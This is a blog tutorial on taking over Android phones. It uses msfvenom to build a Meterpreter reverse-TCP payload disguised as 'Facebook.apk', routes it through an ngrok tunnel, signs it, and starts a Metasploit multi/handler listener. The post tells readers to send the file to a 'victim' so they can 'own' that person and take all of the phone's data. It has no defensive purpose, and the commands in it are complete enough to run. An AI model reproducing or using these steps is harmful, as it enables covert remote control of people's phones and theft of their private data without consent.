Skip to content

Hacking Android — Without Port Forwarding

Published by Khan Suhail on October 12, 2018

androidhacking

Hello.
So today i would be writing about how you can actually make use of your Linux environment to actually hack down a Android device.  We wont be using any vulnerability of the Android rather will abuse the Permissions required to install a app in Android and take over the entire module.

So lets begin:
[My Blogs instructions are on LINUX environment. You can use VMware or Dual boot to use Linux or other Debian based OS]

  1. First you need to sign up on NGROK  or if you already have created then you need to login to get the AuthTokens and also to download the ngrok bridge file into your LinuX.NGROK 1
  2. After you have downloaded the file, you need to create a folder name ‘ngrok’ in your ‘bin’ folder and paste it in that folder.Screenshot from 2018-10-12 18-52-35
  3. Now open up your terminal and type following commands

    cd bin
    cd ngrok

    Screenshot from 2018-10-12 18-57-48

  4. You need to copy your AuthToken  which you’ll get from after signing up on ngrok. You can see picture in ‘Step 1’ for the procedure to get yours.
  5. Your AuthToken might appear like this ” 2Lpi8tCY86c3D1kGt3eWN_2KuEEV7HZNFN2FUt9r55t”. Type the following command to enter the AuthToken in your .xml file in bin.

    ./ngrok authtoken ‘YOUR_AUTHTOKEN’

    Screenshot from 2018-10-12 19-25-41

  6. The next would be to assign the port:

    ./ngrok http 80

  7. The port number ’80’ can be replaced by any port. So now when you are done with the above command, you’ll have your interface on web settled up.
    Screenshot from 2018-10-12 19-35-25
  8. As of now – our secured tunnel to our localhost is already maintained. So its time to generate the .apk file which we will be forwarding to our Victim.
  9. Note down   ‘https://e7f7ad8c.ngrok.io -> localhost: 80 ‘{you’ll have different forwarding interface link so copy yours} from your previous Terminal. Open up a new terminal and fire up the command to generate the .apk file for the Victim-Android User.

    msfvenom -p android/meterpreter/reverse_tcp LHOST=e7f7ad8c.ngrok.io LPORT=80 R >/root/Desktop/Facebook.apk

    Screenshot from 2018-10-12 19-54-47.png
    After running the above command by carefully managing your link and your any random port number, a ‘Facebook.apk’  will be generated on Desktop.

  10. For the above msfvenom command;
    -p   –> Implies to payload
    android/meterpreter/reverse_tcp  –> Lets the nature of the file .i.e. android/windows.
    lhost –> The address where the data will be monitored
    lport –> Is the Port Number
    R >/root/Desktop/Facebook.apk –> Directory and the name of the file you want.
  11. As android now no longer allows application which aren’t signed correctly so you gotta sign it too.
    Clone the file from gitHUB

    git clone https://github.com/techexpertize/SignApk

    Once the SignApk is cloned/downloaded from GitHub move it on your Desktop and move the ‘Facebook.apk‘ file in the same folder.

  12. Now get in the SignApk folder from command line.screenshot-from-2018-10-12-20-14-21.png
  13. You need to open ‘Signing.txt’ and copy the entire path and paste it in your command line and then change ‘your-app.apk your-app-signed.apk‘ with your file name.Once change press Enter key. Refer the below picture*Screenshot from 2018-10-12 20-26-48 Great the apk file is binded now with the signature.
  14. Its time to start the Payload Listener in our terminal. Open the terminal and type;

    msfconsole

After ‘msfconsole’ the following command need to be executed-
a) use exploit/multi/handler
b) set PAYLOAD android/meterpreter/reverse_tcp
c) set lhost e7f7ad8c.ngrok.io
d) set lport 80 //Your port Number and URL which you got from ‘Step: 7’
e) exploit -j

screenshot-from-2018-10-12-22-03-23.png

15. Its time for you to use your skills and forward the .apk file to the Victim Android-User and let it get installed in the device.
FUgcbhZ
16. Once the File is Installed your terminal will automatically connect you with the Android. So what basically happened here is, you gave all permission to the apk file. Enough permissions to take over your android.
Now you own HIM or HER completely

17. Type: ‘-h’ and hit enter to get all the commands you can use to get the data out of phone.
Fm2f3Jd

Use the Commands and get all the data from the Victim Android-User directly in Your PC. Read the Descriptions so that you’ll know what command is used for which purpose.

 

That’s all to it. Any Error or any help or any feedback, you can share in comments or mail me for the same

THANK YOU

Published inAndroid Hacking

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *